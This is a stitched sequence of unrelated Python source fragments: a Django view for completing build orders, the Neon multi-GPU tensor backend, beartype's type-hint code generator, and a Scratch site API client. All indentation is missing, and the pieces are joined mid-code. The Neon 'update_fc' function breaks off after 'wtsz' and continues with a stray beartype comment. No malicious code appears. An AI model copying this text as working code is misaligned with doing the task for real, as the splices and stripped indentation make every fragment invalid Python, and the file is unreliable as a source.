'success': _('Completed build order')
}
class BuildOutputComplete(AjaxUpdateView):
"""
View to mark a particular build output as Complete.
- Notifies the user of which parts will be removed from stock.
- Removes allocated items from stock
- Deletes pending BuildItem objects
"""
model = Build
form_class = forms.CompleteBuildOutputForm
context_object_name = "build"
ajax_form_title = _("Complete Build Output")
ajax_template_name = "build/complete_output.html"
role_required = 'build.change'
def get_form(self):
build = self.get_object()
form = super().get_form()
# Extract the build output object
output = None
output_id = form['output'].value()
try:
output = StockItem.objects.get(pk=output_id)
except (ValueError, StockItem.DoesNotExist):
pass
if output:
if build.isFullyAllocated(output):
form.fields['confirm_incomplete'].widget = HiddenInput()
return form
def validate(self, build, form, **kwargs):
data = form.cleaned_data
output = data.get('output', None)
if output:
quantity = data.get('quantity', None)
if quantity and quantity > output.quantity:
form.add_error('quantity', _('Quantity to complete cannot exceed build output quantity'))
if not build.isFullyAllocated(output):
confirm = str2bool(data.get('confirm_incomplete', False))
if not confirm:
form.add_error('confirm_incomplete', _('Confirm completion of incomplete build'))
else:
form.add_error(None, _('Build output must be specified'))
def get_initial(self):
""" Get initial form data for the CompleteBuild form
- If the part being built has a default location, pre-select that location
"""
initials = super().get_initial()
build = self.get_object()
if build.part.default_location is not None:
try:
location = StockLocation.objects.get(pk=build.part.default_location.id)
initials['location'] = location
except StockLocation.DoesNotExist:
pass
output = self.get_param('output', None)
if output:
try:
output = StockItem.objects.get(pk=output)
except (ValueError, StockItem.DoesNotExist):
output = None
# Output has not been supplied? Try to "guess"
if not output:
incomplete = build.get_build_outputs(complete=False)
if incomplete.count() == 1:
output = incomplete[0]
if output is not None:
initials['output'] = output
initials['location'] = build.destination
return initials
def get_context_data(self, **kwargs):
"""
Get context data for passing to the rendered form
- Build information is required
"""
build = self.get_object()
context = {}
# Build object
context['build'] = build
form = self.get_form()
output = form['output'].value()
if output:
try:
output = StockItem.objects.get(pk=output)
context['output'] = output
except (ValueError, StockItem.DoesNotExist):
pass
return context
# ----------------------------------------------------------------------------
# Copyright 2015 Nervana Systems Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ----------------------------------------------------------------------------
"""
Neon multigpu backend for NervanaGPU.
Decorates most functions from the single GPU backend.
The basic tensor type used here is the Multi GPU Tensor, which tracks shards
and replicas of data, weights, etc on different devices via maintenance of
contexts and an internal tensor list.
"""
import logging
from neon.backends.backend import Block
from neon.backends.gpu import GPU
from nervanagpu import NervanaGPU, GPUTensor
import pycuda.driver as drv
import numpy as np
from functools import wraps
import atexit
logger = logging.getLogger(__name__)
def replicate(method):
def decorate(cls):
@wraps(cls)
def func(self, *args, **kwargs):
if self.ng.block is not None:
self.call_stack.append((method, args, kwargs))
return
else:
tsrlist = []
for idx, ctx in enumerate(getattr(self, 'ctxs')):
ctx.push()
self.ng.stream = self.strms[idx]
myargs = [a.tlist[idx] if isinstance(
a, MGPUTensor) else a for a in args]
mykwargs = {k: v.tlist[idx] if isinstance(
v, MGPUTensor) else v for k, v in kwargs.iteritems()}
tsrlist.append(
getattr(super(cls, self), method)(*myargs, **mykwargs))
self.ng.stream = None
ctx.pop()
return MGPUTensor(tsrlist) if tsrlist[0] is not None else None
setattr(cls, method, func)
return cls
return decorate
def passthru(method):
def decorate(cls):
@wraps(cls)
def func(self, *args, **kwargs):
tsrlist = []
for idx, (tsr, ctx) in enumerate(zip(getattr(self, '_tensorlist'),
getattr(self, 'ctxs'))):
ctx.push()
myargs = [a.tlist[idx] if isinstance(
a, MGPUTensor) else a for a in args]
mykwargs = {k: v.tlist[idx] if isinstance(
v, MGPUTensor) else v for k, v in kwargs.iteritems()}
tsrlist.append(getattr(tsr, method)(*myargs, **mykwargs))
ctx.pop()
if tsrlist[0] is not None:
return MGPUTensor(tsrlist, ptype=self.ptype)
setattr(cls, method, func)
return cls
return decorate
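# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the original backend): replicate() and
# passthru() above are two variants of the same "fan-out" idea, dispatching
# a single logical call to every per-device object and gathering the
# results. A minimal, device-free analogue (all names here hypothetical):
def _fan_out(method):
    def func(self, *args, **kwargs):
        results = []
        for idx, obj in enumerate(self._objs):
            # Split any fanned-out arguments by shard index; pass scalars
            # through unchanged.
            myargs = [a._objs[idx] if hasattr(a, '_objs') else a
                      for a in args]
            results.append(getattr(obj, method)(*myargs, **kwargs))
        return results
    return func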
@passthru('_assign')
@passthru('fill')
@passthru('reshape')
@passthru('copy_from')
@passthru('__getitem__')
@passthru('__add__')
@passthru('__sub__')
@passthru('__mul__')
@passthru('__div__')
@passthru('__truediv__')
@passthru('__pow__')
@passthru('__radd__')
@passthru('__rsub__')
@passthru('__rmul__')
@passthru('__rdiv__')
@passthru('__ne__')
@passthru('__eq__')
class MGPUTensor(object):
ctxs = None
num_dev = 0
def __init__(self, tensorlist, ptype='fragment'):
self._tensorlist = tensorlist
self.ptype = ptype
@property
def shape(self):
return self._tensorlist[0].shape
@property
def dtype(self):
return self._tensorlist[0].dtype
@property
def size(self):
return self._tensorlist[0].size
@property
def is_contiguous(self):
return self._tensorlist[0].is_contiguous
@property
def tlist(self):
return self._tensorlist
@property
def ptr(self):
return self._tensorlist[0].gpudata.__int__()
def __setitem__(self, index, value):
if self.ctxs is None:
raise ValueError("Contexts not defined")
for idx, (tsr, ctx) in enumerate(zip(getattr(self, '_tensorlist'),
getattr(self, 'ctxs'))):
ctx.push()
if isinstance(value, MGPUTensor):
tsr.__setitem__(index, value._tensorlist[idx])
else:
tsr.__setitem__(index, value)
ctx.pop()
def asnumpyarray(self):
if self.ptype == 'replica':
self.ctxs[0].push()
rval = self._tensorlist[0].get()
self.ctxs[0].pop()
return rval
else:
rval = []
for subtensor, ctx in zip(self.tlist, self.ctxs):
ctx.push()
npv = subtensor.get()
rval.append(npv)
ctx.pop()
if self.ptype == 'vfragment':
return np.vstack(rval)
else:
return np.hstack(rval)
@property
def T(self): # noqa
"""
return a transposed view
"""
tsrlist = []
for tsr in self._tensorlist:
tsrlist.append(GPUTensor(backend=tsr.backend,
shape=tsr.shape[::-1], dtype=tsr.dtype,
allocator=tsr.allocator, base=tsr,
gpudata=tsr.gpudata,
strides=tsr.strides[::-1],
is_trans=(not tsr.is_trans),
name=tsr.name, rounding=tsr.rounding))
return self.__class__(tsrlist)
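# Illustrative note (not from the original source): the T property above
# builds a zero-copy transposed view of every shard by reversing shape and
# strides. E.g. a row-major (3, 4) shard with element strides (4, 1)
# becomes a (4, 3) view with strides (1, 4) over the same gpudata buffer,
# with is_trans flipped so downstream GEMM calls treat it correctly.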
@replicate('fprop_conv')
@replicate('convolution')
@replicate('bprop_conv')
@replicate('update_conv')
@replicate('fprop_pool')
@replicate('bprop_pool')
@replicate('logistic')
@replicate('rectlin')
@replicate('rectlin_derivative')
@replicate('rectleaky')
@replicate('rectleaky_derivative')
@replicate('sum')
@replicate('mean')
@replicate('min')
@replicate('max')
@replicate('variance')
@replicate('fabs')
@replicate('sqrt')
@replicate('zeros')
@replicate('ones')
@replicate('empty')
@replicate('array')
@replicate('add')
@replicate('subtract')
@replicate('multiply')
@replicate('divide')
@replicate('greater')
@replicate('equal')
@replicate('not_equal')
@replicate('clip')
@replicate('log')
@replicate('tanh')
@replicate('argmax')
@replicate('softmax')
@replicate('softmax_gradient')
@replicate('make_binary_mask')
@replicate('gdm_compound')
@replicate('gdmwd_compound')
@replicate('ada_update')
@replicate('crossent')
@replicate('transpose')
@replicate('logistic_compound')
@replicate('fprop_bn_compound')
@replicate('bprop_bn_compound')
class MGPU(GPU):
default_dtype = np.float32
num_dev = 1
is_dist = True
def __init__(self, rng_seed, stochastic_round=False, device_id=0,
num_dev=2):
drv.init()
self.num_dev = num_dev
if device_id == 0:
self.dev_list = range(num_dev)
else:
self.dev_list = device_id
assert len(self.dev_list) == self.num_dev
assert self.num_dev <= drv.Device.count()
self.ctxs = []
self.devs = []
self._strms = []
self._redstrms = []
self._events = []
self._redevents = []
self.async = True
self._nostrms = [None for i in self.dev_list]
for i in self.dev_list:
self.devs.append(drv.Device(i))
for dev in self.devs:
self.ctxs.append(
dev.make_context(drv.ctx_flags.SCHED_BLOCKING_SYNC))
self._strms.append(drv.Stream())
self._redstrms.append(drv.Stream())
self._events.append(drv.Event())
self._redevents.append(drv.Event())
drv.Context.pop()
self.ctxs[0].push()
atexit.register(drv.Context.pop)
MGPUTensor.ctxs = self.ctxs
MGPUTensor.num_dev = num_dev
self.ng = NervanaGPU(stochastic_round=stochastic_round)
logger.info("Initialized %d device NervanaGPU, stochastic_round=%s",
num_dev, stochastic_round)
self.ng.block = None
self.rng_seed = rng_seed
self.rng_init()
# Setup the pairwise contexts
# TODO clean up this code to avoid indexing
for dev1, ctx1 in zip(self.devs, self.ctxs):
ctx1.push()
for dev2, ctx2 in zip(self.devs, self.ctxs):
if dev1 == dev2:
continue
if dev1.can_access_peer(dev2):
ctx1.enable_peer_access(ctx2)
else:
print('Cannot enable peer access between '
'{} and {}'.format(dev1, dev2))
ctx1.pop()
def make_events(self):
evtlist = []
for ctx in self.ctxs:
ctx.push()
evtlist.append(drv.Event())
ctx.pop()
return evtlist
# These definitions are for performing grouped context commands
# This is experimental and should remove _stack for actual usage
def begin_stack(self, block, identifier):
if block == Block.update:
self.ng.block = Block.update
self.call_stack = []
else:
pass
def end_stack(self, block, identifier):
if block == Block.update:
self.ng.block = None
for idx, ctx in enumerate(self.ctxs):
ctx.push()
self.ng.stream = self.strms[idx]
for method, args, kwargs in self.call_stack:
myargs = [a._tensorlist[idx] if isinstance(
a, MGPUTensor) else a for a in args]
mykwargs = {k: v._tensorlist[idx] if isinstance(
v, MGPUTensor) else v for k, v in kwargs.iteritems()}
getattr(super(MGPU, self), method)(*myargs, **mykwargs)
self.ng.stream = None
ctx.pop()
self.call_stack = None
else:
pass
@property
def strms(self):
return self._strms if self.async else self._nostrms
@property
def redstrms(self):
return self._redstrms if self.async else self._nostrms
def uniform(self, low=0.0, high=1.0, size=1, dtype=default_dtype,
name=None, persist_values=True, ptype='replica'):
"""
generate numpy random number and convert to a GPUTensor.
If called with dtype=None it will probably explode
"""
assert len(size) == 2
result = self.empty(size, dtype=dtype, persist_values=persist_values)
result.ptype = ptype
beshape = size if ptype == 'replica' else (self.num_dev * size[0],
size[1])
ary = np.random.uniform(low, high, beshape).astype(dtype)
self.set(result, ary)
return result
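# Illustrative note (not from the original source): for size=(4, 3) with
# num_dev=2, ptype='replica' draws a single (4, 3) host array and set()
# copies it to both devices, whereas ptype='fragment' draws an (8, 3)
# host array and set() scatters four contiguous rows to each device.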
def normal(self, loc=0.0, scale=1.0, size=1, dtype=default_dtype,
name=None, persist_values=True, ptype='replica'):
"""
Gaussian/Normal random number sample generation
"""
assert len(size) == 2
result = self.empty(size, dtype=dtype, persist_values=persist_values)
result.ptype = ptype
beshape = size if ptype == 'replica' else (self.num_dev * size[0],
size[1])
ary = np.random.normal(loc, scale, beshape).astype(dtype)
self.set(result, ary)
return result
def synchronize(self):
if not self.async:
return
for s in self.strms:
s.synchronize()
def redsynchronize(self):
if not self.async:
return
for s in self.redstrms:
s.synchronize()
def allocate_fragment(self, shape, dtype=default_dtype,
persist_values=True):
# TODO: set ptype to be fragment in this case ??
return self.empty((shape[0], shape[1] / self.num_dev), dtype,
persist_values=persist_values)
def zeros_like(self, ary, dtype=default_dtype, persist_values=True,
name=None):
result = self.zeros(ary.shape, dtype=dtype,
persist_values=persist_values)
result.ptype = ary.ptype
return result
def empty_like(self, ary, dtype=default_dtype, persist_values=True,
name=None):
result = self.empty(ary.shape, dtype=dtype,
persist_values=persist_values, name=name)
result.ptype = ary.ptype
return result
def set(self, tensor, data):
assert isinstance(tensor, MGPUTensor)
if tensor.ptype == 'replica':
for dest, strm, ctx in zip(tensor.tlist, self.strms, self.ctxs):
ctx.push()
drv.memcpy_htod_async(dest.ptr, data, strm)
ctx.pop()
# tensor.copy_from(data)
else:
self.scatter(data, tensor)
def scatter(self, hbuf, dbuf):
'''
Scatters the array data in hbuf across the mgpu tensor: device i
receives the i-th contiguous block of dbuf.size elements.
Assumes hbuf holds num_dev times as many elements as each per-device
dbuf shard, and that hbuf and dbuf share the same dtype.
'''
assert hbuf.size == dbuf.size * dbuf.num_dev
assert isinstance(dbuf, MGPUTensor)
assert hbuf.dtype == dbuf.dtype
ndata = dbuf.size
starts = [i * ndata for i in range(self.num_dev)]
for dest, strm, ctx, doff in zip(dbuf.tlist, self.strms, self.ctxs,
starts):
src = hbuf.reshape((hbuf.size))[doff:(doff + ndata)]
ctx.push()
drv.memcpy_htod_async(dest.ptr, src, strm)
ctx.pop()
self.synchronize()
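# Illustrative note (not from the original source): with num_dev=2 and a
# per-device shard of 12 elements, scatter() computes starts = [0, 12],
# async-copies hbuf[0:12] to device 0 and hbuf[12:24] to device 1 on the
# per-device streams, then synchronize()s, presumably so the host buffer
# can be reused safely afterwards.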
def fprop_fc(self, out, inputs, weights, layer=None):
"""
In this case, the weights are shards, the acts are replicas
ubuf should be of size nout/num_dev x mbsz
"""
ubuf = layer.mempool[0]
assert ubuf.shape == (weights.shape[0], inputs.shape[1])
if layer.use_biases:
biases = layer.biases.tlist
else:
biases = [None for i in range(self.num_dev)]
for dbuf, ibuf, wt, bs, strm, ctx in zip(ubuf.tlist, inputs.tlist,
weights.tlist, biases,
self.strms, self.ctxs):
ctx.push()
self.ng.stream = strm
self.ng.dot(wt, ibuf, dbuf)
if layer.use_biases:
self.ng.add(dbuf, bs, out=dbuf)
ctx.pop()
# Note, should be safe not to sync because each fragment is computed
# on the same stream that originates the copy
# self.synchronize()
self.fragment_to_replica(ubuf, out)
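# Illustrative note (not from the original source): in fprop_fc each
# device holds a weight shard of shape (nout/num_dev, nin) and a full
# replica of the inputs (nin, mbsz), so every local dot() produces a
# (nout/num_dev, mbsz) fragment in ubuf; fragment_to_replica() then
# gathers those fragments into the full (nout, mbsz) output everywhere.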
def bprop_fc(self, out, weights, deltas, layer=None):
"""
Backward propagate the error through a fully connected network layer.
Arguments:
out (GPUTensor): Where to store the backward propagated errors.
weights (GPUTensor): The weight coefficient values for this layer.
deltas (GPUTensor): The error values for this layer
layer (Layer): The layer object.
"""
ubuf = layer.mempool[1]
wtsz = weights.shape[0]
starts = [i * wtsz for i in range(self.num_dev)]
assert out.shape == (weights.shape[1], deltas.shape[1])
assert ubuf.shape == out.shape
for dbuf, ibuf, wt, strm, ctx, off in zip(out.tlist, deltas.tlist,
weights.tlist, self.strms,
self.ctxs, starts):
ctx.push()
self.ng.stream = strm
self.ng.dot(wt.T, ibuf[off:(off + wtsz)], dbuf)
ctx.pop()
# Note, should be safe not to sync because each fragment is computed
# on the same stream that originates the copy
self.synchronize()
self.reduce(out, ubuf)
def update_fc(self, out, inputs, deltas, layer=None):
wtsz
the current pith
# into the "{obj}" variable already embedded by
# that class into this code.
hint_child_expr=(
hint_child._is_valid_code.format(
indent=indent_child,
obj=pith_curr_var_name,
)),
))
# Generate locals safely merging the locals required by
# both this validator code *AND* the current code
# type-checking this entire root hint.
update_mapping(
mapping_trg=func_wrapper_locals,
mapping_src=hint_child._is_valid_code_locals,
)
# Munge this code to...
func_curr_code = (
# Strip the erroneous " and" suffix appended by the
# last child hint from this code.
f'{func_curr_code[:_LINE_RSTRIP_INDEX_AND]}'
# Suffix this code by the substring suffixing all such
# code.
f'{PEP593_CODE_HINT_VALIDATOR_SUFFIX_format(indent_curr=indent_curr)}'
)
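# Illustrative note (not from the original source): at this point the
# generated validator code resembles "(\n{check_1} and\n{check_2} and",
# so the slice above drops the trailing " and" and the suffix closes the
# parenthesized conjunction at the current indentation level.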
# Else, this hint is *NOT* a metahint.
#
# ............{ SUBCLASS }............
# If this hint is either a PEP 484- or 585-compliant subclass
# type hint...
elif hint_curr_sign is HintSignType:
#FIXME: Optimization: if the superclass is an ignorable
#class (e.g., "object", "Protocol"), this type hint is
#ignorable (e.g., "Type[object]", "type[Protocol]"). We'll
#thus want to:
#* Add that detection logic to one or more
# is_hint_*_ignorable() testers elsewhere.
#* Call is_hint_ignorable() below.
#* Unit test such type hints to indeed be ignorable.
# Superclass this pith is required to be a subclass of.
hint_child = get_hint_pep484585_subclass_superclass(
hint=hint_curr, exception_prefix=hint_curr_exception_prefix)
#FIXME: Unit test us up, please.
# If this superclass is either a class *OR* tuple of
# classes...
if isinstance(hint_child, TestableTypes):
# Python expression evaluating to this superclass.
hint_curr_expr = add_func_scope_type_or_types(
type_or_types=hint_child, # type: ignore[arg-type]
func_scope=func_wrapper_locals,
exception_prefix=(
_EXCEPTION_PREFIX_FUNC_WRAPPER_LOCAL),
)
#FIXME: *UNIT TEST THIS PLEASE.*
# Else, this superclass is *NOT* actually a class. By
# process of elimination and the validation already
# performed above by the
# get_hint_pep484585_subclass_superclass() getter, this
# superclass *MUST* be a forward reference to a class.
else:
# Render this forward reference accessible to the body
# of this wrapper function. See above for commentary.
hint_curr_expr, hint_forwardrefs_class_basename = (
express_func_scope_type_forwardref(
forwardref=hint_child,
forwardrefs_class_basename=(
hint_forwardrefs_class_basename),
func_scope=func_wrapper_locals,
))
# Code type-checking this pith against this superclass.
func_curr_code = PEP484585_CODE_HINT_SUBCLASS_format(
pith_curr_assign_expr=pith_curr_assign_expr,
pith_curr_var_name=pith_curr_var_name,
hint_curr_expr=hint_curr_expr,
indent_curr=indent_curr,
)
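# Illustrative note (not from the original source): for a hint like
# "Type[MuhClass]", hint_child above is "MuhClass" and the formatted
# snippet effectively asserts that the pith is itself a class satisfying
# issubclass(pith, MuhClass).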
# Else, this hint is neither a PEP 484- nor 585-compliant
# subclass type hint.
#
# ............{ GENERIC or PROTOCOL }............
# If this hint is either a:
# * PEP 484-compliant generic (i.e., user-defined class
# subclassing a combination of one or more of the
# "typing.Generic" superclass and other "typing" non-class
# pseudo-superclasses) *OR*...
# * PEP 544-compliant protocol (i.e., class subclassing a
# combination of one or more of the "typing.Protocol"
# superclass and other "typing" non-class
# pseudo-superclasses) *OR*...
# * PEP 585-compliant generic (i.e., user-defined class
# subclassing at least one non-class PEP 585-compliant
# pseudo-superclasses) *OR*...
# Then this hint is a PEP-compliant generic. In this case...
elif hint_curr_sign is HintSignGeneric:
#FIXME: *THIS IS NON-IDEAL.* Ideally, we should propagate
#*ALL* child type hints subscripting a generic up to *ALL*
#pseudo-superclasses of that generic (e.g., the "int" child
#hint subscripting a parent hint "MuhGeneric[int]" of type
#"class MuhGeneric(list[T]): pass" up to its "list[T]"
#pseudo-superclass).
#
#For now, we just strip *ALL* child type hints subscripting
#a generic with the following call. This suffices, because
#we just need this to work. So it goes, uneasy code
#bedfellows.
# If this hint is *NOT* a class, this hint is *NOT* an
# unsubscripted generic but could still be a generic
# subscripted by one or more PEP-compliant child hints.
#
# To decide, reduce this hint to the object originating
# this hint if any, enabling the subsequent assertion to
# assert whether this origin object is an unsubscripted
# generic, which would then imply this hint to be a
# subscripted generic. If this strikes you as insane,
# you're not alone.
hint_curr = get_hint_pep484585_generic_type(
hint=hint_curr,
exception_prefix=hint_curr_exception_prefix,
)
# Tuple of the one or more unerased pseudo-superclasses
# originally listed as superclasses prior to their type
# erasure by this generic.
hint_childs = get_hint_pep484585_generic_bases_unerased(
hint=hint_curr, exception_prefix=hint_curr_exception_prefix)
# Initialize the code type-checking this pith against this
# generic to the substring prefixing all such code.
func_curr_code = PEP484585_CODE_HINT_GENERIC_PREFIX
# For each pseudo-superclass subclassed by this generic...
for hint_child in hint_childs:
# print(f'hint_child: {repr(hint_child)} {is_hint_pep_type_typing(hint_child)}')
# If this pseudo-superclass is an actual class, this
# class is effectively ignorable. Why? Because the
# "PEP484585_CODE_HINT_GENERIC_PREFIX" snippet
# leveraged above already type-checks this pith against
# the generic subclassing this superclass and thus this
# superclass as well with a trivial isinstance() call.
# In this case, skip to the next pseudo-superclass.
if isinstance(hint_child, type):
continue
# Else, this pseudo-superclass is *NOT* a class.
#
# If this pseudo-superclass is neither a PEP
# 585-compliant type hint *NOR* a PEP-compliant type
# hint defined by the "typing" module, this
# pseudo-superclass *MUST* be a user-defined
# pseudo-superclass *NOT* compliant with PEP
# 585. In this case, reduce this pseudo-superclass to
# the corresponding actual superclass originating
# this pseudo-superclass. Note that:
# * This horrible, irrational, and unintuitive edge
# case arises *ONLY* for user-defined PEP
# 484-compliant generics and PEP 544-compliant
# protocols subclassing another user-defined generic
# or protocol superclass subscripted by one or more
# type variables: e.g.,
# >>> import typing as t
# >>> class UserProtocol(t.Protocol[t.AnyStr]): pass
# >>> class UserSubprotocol(UserProtocol[str], t.Protocol): pass
# >>> UserSubprotocol.__orig_bases__
# (UserProtocol[str], typing.Protocol)
# >>> UserProtocolUnerased = UserSubprotocol.__orig_bases__[0]
# >>> UserProtocolUnerased is UserProtocol
# False
# >>> isinstance(UserProtocolUnerased, type)
# False
# * PEP 585-compliant generics suffer no such issues:
# >>> from beartype._util.hint.pep.proposal.utilpep585 import is_hint_pep585_builtin
# >>> class UserGeneric(list[int]): pass
# >>> class UserSubgeneric(UserGeneric[int]): pass
# >>> UserSubgeneric.__orig_bases__
# (UserGeneric[int],)
# >>> UserGenericUnerased = UserSubgeneric.__orig_bases__[0]
# >>> isinstance(UserGenericUnerased, type)
# True
# >>> UserGenericUnerased.__mro__
# (UserGeneric, list, object)
# >>> is_hint_pep585_builtin(UserGenericUnerased)
# True
#
# Walking up the unerased inheritance hierarchy for
# this generic or protocol iteratively visits the
# user-defined generic or protocol pseudo-superclass
# subscripted by one or more type variable. Due to
# poorly defined obscurities in the "typing"
# implementation, this pseudo-superclass is *NOT*
# actually a class but rather an instance of a private
# "typing" class (e.g., "typing._SpecialForm").
#
# Ergo, this pseudo-superclass will be subsequently
# detected as neither a generic nor "typing" object and
# thus raise exceptions. Our only recourse is to
# silently reduce this hint into the erased superclass
# to which the "typing" module previously transformed
# this hint (e.g., "UserProtocol" above). This is
# slightly non-ideal, as this erased superclass is an
# actual class that should ideally be ignored rather
# than redundantly tested against the current pith
# again. Nonetheless, there exists no other means of
# recursing into the possibly relevant superclasses of
# this erased superclass.
#
# Note that, in theory, we could deeply refactor this
# whole algorithm to support the notion of child hints
# that should be ignored for purposes of type-checking
# but nonetheless recursed into. In practice, the
# current approach only introduces mild runtime
# inefficiencies while preserving sanity throughout
# this algorithm.
#
# Specifically, perform this awful reduction *ONLY* if
# this pseudo-superclass is a PEP 484- or 544-compliant
# user-defined pseudo-superclass that is neither...
elif not (
# A PEP 585-compliant pseudo-superclass *NOR*...
is_hint_pep585_builtin(hint_child) or
# A PEP 484- or 544-compliant pseudo-superclass
# defined by the "typing" module.
is_hint_pep_typing(hint_child)
):
hint_child = get_hint_pep484_generic_base_erased_from_unerased(
hint_child)
# Else, this pseudo-superclass is defined by the "typing"
# module.
# If this superclass is ignorable, do so.
if is_hint_ignorable(hint_child):
continue
# Else, this superclass is unignorable.
# Generate and append code type-checking this pith
# against this superclass.
func_curr_code += (
PEP484585_CODE_HINT_GENERIC_CHILD_format(
hint_child_placeholder=_enqueue_hint_child(
# Python expression efficiently reusing the
# value of this pith previously assigned to
# a local variable by the prior prefix.
pith_curr_var_name),
))
# Munge this code to...
func_curr_code = (
# Strip the erroneous " and" suffix appended by the
# last child hint from this code.
f'{func_curr_code[:_LINE_RSTRIP_INDEX_AND]}'
# Suffix this code by the substring suffixing all such
# code.
f'{PEP484585_CODE_HINT_GENERIC_SUFFIX_format(indent_curr=indent_curr)}'
)
import requests
import json
from .UserProfiles import YourUserProfile, AnotherUserProfile
from .Project import YourProject, AnotherProject
from bs4 import BeautifulSoup
from .Comments import UserComment
import re
class YourUser:
def __init__(self, data, client):
self.id = data["id"]
self.username = data["username"]
self.joined_timestamp = data["history"]["joined"]
self.scratchteam = data["scratchteam"]
self.scrather = requests.get(f"https://isscratcher.9pfs.repl.co/api/{self.username}").json()["isScratcher"]
self.profile = YourUserProfile(data["profile"], self)
self._client = client
self._headers = {
"x-csrftoken": self._client.csrf_token,
"X-Token": self._client.token,
"x-requested-with": "XMLHttpRequest",
"Cookie": "scratchcsrftoken="
+ self._client.csrf_token
+ ";scratchlanguage=en;scratchsessionsid="
+ self._client.session_id
+ ";",
"referer": "https://scratch.mit.edu/users/" + self.username + "/",
}
def get_projects(self, all=False, limit=20, offset=0):
if all:
projects = []
offset = 0
while True:
res = requests.get(
"https://api.scratch.mit.edu/users/"
+ self.username
+ "/projects/"
+ "?limit=40&offset="
+ str(offset)
).json()
projects += res
if len(res) != 40:
break
offset += 40
for x, i in enumerate(projects):
projects[x].update({
"author": {"username": self.username}
})
return [
YourProject(i, self._client) if i["author"]["username"] == self._client.username else AnotherProject(i,
self._client)
for i in projects]
else:
projects = requests.get(
"https://api.scratch.mit.edu/users/"
+ self.username
+ "/projects/"
+ "?limit="
+ str(limit)
+ "&offset="
+ str(offset)
).json()
for x, i in enumerate(projects):
projects[x].update({
"author": {"username": self.username}
})
return [
YourProject(i, self._client) if i["author"]["username"] == self._client.username else AnotherProject(i,
self._client)
for i in projects]
def get_curating(self, all=False, limit=20, offset=0):
if all:
studios = []
offset = 0
while True:
res = requests.get(
"https://api.scratch.mit.edu/users/"
+ self.username
+ "/studios/curate"
+ "?limit=40&offset="
+ str(offset)
).json()
studios += res
if len(res) != 40:
break
offset += 40
return list(map(self._client._to_studio, studios))
else:
return list(
map(
self._client._to_studio,
requests.get(
"https://api.scratch.mit.edu/users/"
+ self.username
+ "/studios/curate/"
+ "?limit="
+ str(limit)
+ "&offset="
+ str(offset)
).json(),
)
)
def get_favorites(self, all=False, limit=20, offset=0):
if all:
projects = []
offset = 0
while True:
res = requests.get(
"https://api.scratch.mit.edu/users/"
+ self.username
+ "/favorites/"
+ "?limit=40&offset="
+ str(offset)
).json()
projects += res
if len(res) != 40:
break
offset += 40
for x, i in enumerate(projects):
projects[x]["author"] = {"username": self.username}
return [
YourProject(i, self._client) if i["author"]["username"] == self._client.username else AnotherProject(i,
self._client)
for i in projects]
else:
projects = requests.get(
"https://api.scratch.mit.edu/users/"
+ self.username
+ "/favorites/"
+ "?limit="
+ str(limit)
+ "&offset="
+ str(offset)
).json()
for x, i in enumerate(projects):
projects[x]["author"] = {"username": self.username}
return [
YourProject(i, self._client) if i["author"]["username"] == self._client.username else AnotherProject(i,
self._client)
for i in projects]
def get_followers(self, all=False, limit=20, offset=0):
if all:
users = []
offset = 0
while True:
res = requests.get(
"https://api.scratch.mit.edu/users/"
+ self.username
+ "/followers/"
+ "?limit=40&offset="
+ str(offset)
).json()
users += res
if len(res) != 40:
break
offset += 40
return [
YourUser(i, self._client) if i["username"] == self._client.username else AnotherUser(i,
self._client)
for i in users]
else:
users = list(
requests.get(
"https://api.scratch.mit.edu/users/"
+ self.username
+ "/followers/"
+ "?limit="
+ str(limit)
+ "&offset="
+ str(offset)
).json(),
)
return [
YourUser(i, self._client) if i["username"] == self._client.username else AnotherUser(i,
self._client)
for i in users]
def get_following(self, all=False, limit=20, offset=0):
if all:
users = []
offset = 0
while True:
res = requests.get(
"https://api.scratch.mit.edu/users/"
+ self.username
+ "/following/"
+ "?limit=40&offset="
+ str(offset)
).json()
users += res
if len(res) != 40:
break
offset += 40
return [
YourUser(i, self._client) if i["username"] == self._client.username else AnotherUser(i,
self._client)
for i in users]
else:
users = list(
requests.get(
"https://api.scratch.mit.edu/users/"
+ self.username
+ "/following/"
+ "?limit="
+ str(limit)
+ "&offset="
+ str(offset)
).json(),
)
return [
YourUser(i, self._client) if i["username"] == self._client.username else AnotherUser(i,
self._client)
for i in users]
def get_message_count(self):
return requests.get(
"https://api.scratch.mit.edu/users/" + self.username + "/messages/count/"
).json()["count"]
def get_comments(self, page=1):
comments = []
soup = BeautifulSoup(
requests.get(f"https://scratch.mit.edu/site-api/comments/user/{self.username}/?page={page}").content,
"html.parser")
result = soup.find_all("li", class_="top-level-reply")
def get_replies(count):
'''
Retrieve replies to comment thread.
'''
# Extract reply list
replies = result[count].find("ul", class_="replies")
if replies is None or replies.text == "":
# Detect empty reply chain
return None
else:
# Get DOM node containing user data for comment
user = replies.find_all("div", class_="info")
# print(user)
# Collect the parsed replies for this comment thread
all_replies = []
# Iterate through reply list and extract username
for i in range(0, len(user)):
# Get the element containing this reply's username
username = user[i].find("div", class_="name")
# Redefine username as the actual username element
username = username.find("a").text
# Get post content
content = user[i].find("div", class_="content").text
# Trim username newlines
username = username.strip().replace("\n", "")
# Trim post content newlines
content = content.strip().replace("\n", "")
# Get comment IDs
search = re.search("data-comment-id=", str(result[i]))
# Character offset just past the matched attribute
index = search.span()[1]
data = str(result[i])[index + 1:]
j = 0
id = ""
while data[j] != '"':
id += data[j]
j += 1
id = int(id)
# Get the comment timestamp from the title attribute
search = re.search("title=", str(result[i]))
index = search.span()[1]
data = str(result[i])[index + 1:]
j = 0
comment_time = ""
while data[j] != '"':
comment_time += data[j]
j += 1
reply = {"id": id, "username": username, "comment": content.replace(" ", ""),
"timestamp": comment_time}
all_replies.append(reply)
return all_replies
for i in range(0, len(result)):
user = result[i].find("div", class_="comment")
replies = get_replies(i)
user = user.find("div", class_="info")
user = user.find("div", class_="name")
user = user.find("a")
user = user.text
content = result[i].find("div", class_="comment")
content = content.find("div", class_="info")
content = content.find("div", class_="content")
content = content.text.strip()
search = re.search("data-comment-id=", str(result[i]))
index = search.span()[1]
data = str(result[i])[index + 1:]
j = 0
id = ""
while data[j] != '"':
id += data[j]
j += 1
id = int(id)
search = re.search("title=", str(result[i]))
index = search.span()[1]
